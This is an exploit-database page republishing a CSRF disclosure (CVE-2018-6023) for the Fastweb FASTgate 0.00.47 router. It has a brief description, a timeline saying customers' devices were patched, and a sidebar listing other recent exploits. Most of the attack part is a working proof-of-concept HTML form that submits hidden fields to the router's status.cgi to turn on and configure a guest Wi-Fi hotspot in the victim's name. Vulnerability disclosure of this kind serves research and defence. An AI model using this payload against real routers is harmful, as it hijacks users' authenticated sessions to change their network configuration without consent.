Fastweb fastgate 0.00.47 crosssite request forgery Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-05-10 | Type : webapps | Platform : hardware
This exploit / vulnerability Fastweb fastgate 0.00.47 crosssite request forgery is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Fastweb FASTgate 0.00.47 CSRF
# Date: 09-05-2018
# Exploit Authors: Raffaele Sabato
# Contact: https://twitter.com/syrion89
# Vendor: Fastweb
# Product Web Page: http://www.fastweb.it/adsl-fibra-ottica/dettagli/modem-fastweb-fastgate/
# Version: 0.00.47
# CVE: CVE-2018-6023

I DESCRIPTION
========================================================================

An issue was discovered in Fastweb FASTgate 0.00.47 device. A Cross-site request forgery (CSRF) vulnerability allows remote attackers to hijack the authentication of users for requests that modify the configuration. This vulnerability may lead to Gues Wi-Fi activating, Wi-Fi password changing, etc.
The vulnerability was disclosed to Fastweb on 19 January 2018.
Fastweb independently patched customer devices with non-vulneable version .67 from December 2017 thru March 2018.

II PROOF OF CONCEPT
========================================================================

## Activate Gues Wi-Fi:

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.254/status.cgi">
<input type="hidden" name="&#95;" value="1516312144136" />
<input type="hidden" name="act" value="nvset" />
<input type="hidden" name="hotspot&#95;broadcast&#95;ssid" value="1" />
<input type="hidden" name="hotspot&#95;enable" value="1" />
<input type="hidden" name="hotspot&#95;filtering" value="all" />
<input type="hidden" name="hotspot&#95;security" value="WPA2PSK" />
<input type="hidden" name="hotspot&#95;ssid" value="GUEST&#45;Test" />
<input type="hidden" name="hotspot&#95;timeout" value="&#45;1" />
<input type="hidden" name="service" value="wl&#95;guestaccess" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

III REFERENCES
========================================================================
http://www.fastweb.it/myfastpage/assistenza/guide/FASTGate/

Fastweb fastgate 0.00.47 crosssite request forgery


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Fastweb fastgate 0.00.47 crosssite request forgery Vulnerability / Exploit